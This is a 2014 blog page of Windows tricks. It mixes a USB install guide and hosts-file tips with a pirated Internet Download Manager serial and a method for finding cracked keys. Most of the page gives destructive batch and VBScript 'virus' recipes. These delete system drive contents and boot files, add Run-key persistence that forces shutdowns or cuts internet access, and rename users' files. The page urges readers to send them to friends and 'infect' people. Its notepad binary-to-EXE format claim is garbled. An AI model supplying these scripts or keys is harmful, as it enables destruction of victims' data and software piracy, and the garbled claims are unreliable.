Friday, 28 March 2014
Wednesday, 26 March 2014
How To: Install Windows 7 Or Windows 8 From USB Drive [Detailed 100% Working Guide]
Install Windows 7 Or Windows 8 From Pendrive Or SD Card
Requirements:
- USB Flash Drive (Minimum 4GB)
- Windows 7 or Windows 8 installation files.
Follow
the below steps to create bootable Windows 7/Windows 8 USB drive using
which you can install Windows 7 or Windows 8 easily.
Procedure:
Step 1: Plug-in your USB flash drive to USB port and move all the contents from USB drive to a safe location on your system.
Step 2: Open Command Prompt with admin rights. Use any of the below methods to open Command Prompt with admin rights.
*Type cmd in Start menu search box and hit Ctrl+ Shift+ Enter.
Or
*Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator.
Step 3: You need to know about the USB drive a little bit. Type in the following commands in the command prompt:
First type DISKPART and hit enter to see the below message
Next type LIST DISK command and note down the Disk number (ex: Disk 1) of your USB flash drive. In the below screenshot my Flash Drive Disk no is Disk 1.
Step 4: Next type all the below commands one by one. Here I assume that your disk drive no is “Disk 1”.If you have Disk 2 as your USB flash drive then use Disk 2.Refer the above step to confirm it.
So below are the commands you need to type and execute one by one:
SELECT DISK 1
CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS
(Format process may take few seconds)
ASSIGN
EXIT
Don’t close the command prompt as we need to execute one more command at the next step. Just minimize it.
Step 5: Next insert
your Windows7/Windows 8 DVD into the optical drive and check the drive
letter of the DVD drive. In this guide I will assume that your DVD drive
letter is “D” and USB drive letter is “H” (open my computer to know
about it).
Step 6: Maximize the minimized Command Prompt in the 4th step.Type the following command now:
D: CD BOOT and hit enter.Where “D” is your DVD drive letter.
CD BOOT and hit enter to see the below message.
Step 7: Type another command given below to update the USB drive with BOOTMGR compatible code.
BOOTSECT.EXE /NT60 H:
Where “H” is your USB drive letter. Once you enter the above command you will see the below message.
Step 8: Copy your Windows 7 or Windows 8 DVD contents to the USB flash drive.
Step 9:
Your USB drive is ready to boot and install Windows 7 or Windows 8.
Only thing you need to
change the boot priority at the BIOS to USB from
the HDD or CD ROM drive. I won’t explain it as it’s just the matter the
changing the boot priority or enabling the USB boot option in the BIOS.
Note:
If you are not able to boot after following this guide means you
haven’t set the BIOS priority to USB. If you got any problem in
following this guide feel free to ask questions by leaving comment
This
guide works 100% for Windows 8 as well. Make sure you follow all steps
correctly and launch the Command Prompt with admin rights (as given in
the guide) to avoid errors. Good luck!
Sunday, 23 March 2014
Internet Download Manager 6.07 Final Serial Key
1: Downlaod The IDM from there official site: http://www.internetdownloadmanager.com/download.html
2: Install the Software.
3: Go to the Registration and Register with:
Name: [Any name].
Email: [Any fake email address]
Serial: Serial: DBNJC-D4R59-YPAGA-T3S1Q
How To Convert Fat32 Partiton Into NTFS In Win Xp
- Go to start->Run type cmd and press Enter.
- Type VOL C: and note down the information for volume c. (Change drive letter to the drive you want to convert)
- Now type CONVERT C:/FS:NTFS. (Instead of C: enter any drive name you wan Converting FAT32 to NTFS Remember, do not switch off your PC directly when the process is going on.
- Now check your drive by repeating step 2.
How to Block A Website in All Web Browsers
This action will require you to edit
your Host file. Your host file is a computer file used to store information on
where to find a node on a computer network. For more a more detailed
description. Check out this link Host File Description Link
In Windows XP
1. Click Start->All Programs->Accessories->Command Prompt2. Click Command Prompt This will open a DOS command window.
3. Type: notepad C:/Windows/System32/drivers/etc/hosts
4. Locate the line 127.0.0.1 localhost
5. To block the website google.com for example, just add this text under 127.0.0.1 localhost:
127.0.0.1 google.com
127.0.0.1 www.google.com
In Windows XP
1. Click Start->All Programs->Accessories->Command Prompt2. Click Command Prompt This will open a DOS command window.
3. Type: notepad C:/Windows/System32/drivers/etc/hosts
4. Locate the line 127.0.0.1 localhost
5. To block the website google.com for example, just add this text under 127.0.0.1 localhost:
127.0.0.1 google.com
127.0.0.1 www.google.com
You can add as many sites any site, However you will need to prefix it with "127.0.0.1".
6. Save the file .
Google will now be blocked in all web browser. This is an advanced but easy method on how to blow a website.
Format your HDD with Notepad
If you think that Notepad is useless
then you are wrong because you can now do a lot of things with the Notepad
which you could have never imagined. In this hack I will show you how to format
a HDD using Notepad. This is really cool.
Step 1 => Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 => Save As An EXE Any Name Will Do
Step 3 => Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Step 1 => Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 => Save As An EXE Any Name Will Do
Step 3 => Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Create Virus on Notepad In 13 Ways
1 -> Virus Creation Tricks 1
Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”
Now Save This Notepad file With Any Name Having .vbs Extension .
2 -> Virus Creation Trick 2 .
Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.
3 -> Virus Creation Trick 3
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.
4 -> Virus Creation Trick 4
Toggle your friend's Caps Lock button simultaneously:
Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.
5 -> Virus Creation Trick 5
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.
6 -> Virus Creation Trick 6
This Virus Deletes All The Content Of
A Drive...
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As Anything.bat @echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
7 -> Virus Creation Trick 7
This Will Crash Ur Computer
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Save It As Anything.vbs
8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP
@Echo off
Del C: *.* |y
Save It As Anything.bat
9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On
Save As A bat File
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
11 -> Virus Creation Trick 11
Disable Internet Permanently
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
Save As A bat File
12 -> Virus Creation Trick 12
Change Files To Non-working TXT Files
Save As A bat File
REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
13 -> Virus Creation Trick 13
System Meltdown
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
PAUSE
PAUSE
Save As A bat File
How To Find Serial Key Of Any Software ?
The key 94FBR is a part of
Office 2000 Pro CD activation key that is widely distributed as it
bypasses the activation requirements of Office 2000 Pro. By searching
for 94fbr and the product name, you are guarantee that the pages that
are returned are pages dealing specifically with the product you're
wanting a serial for. Follow simple steps given below to learn this
trick
1. Go to Google
2. Then type Software Name 94FBR
- Replace Software Name with the name of software whose serial key you want to find
- Eg: To find serial key of Nero i will type Nero 94fbr
*INCREASE RAM USING PEN DRIVE*
Recently I come 2 know about a software "Eboostr"which can use flash drive (PENDRIVE) as RAM.
I dont belived firstly then I used that software on my friend's PC,I was amazed to see the result.....
He was worried with 512 MB RAM.Now PC is woking almost at speed of 2GB.
I dont know how does it work but one thing i can say that it works fab. What all u have to do is download the software and install it on ur system.Now it wil ask for the reboot,just do it. Now add ur removable disk in the dropdown list in the control pannel of software & u have done.... I think it is helpful to you. Don't 4get to add ur comments here THE SOFTWARE'S NAME IS"EBOOSTR" Search for it in Google and download
Learn To Make Dangerous Virus In A Minute
![]() | |
How to Make the virus ?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Subscribe to:
Posts (Atom)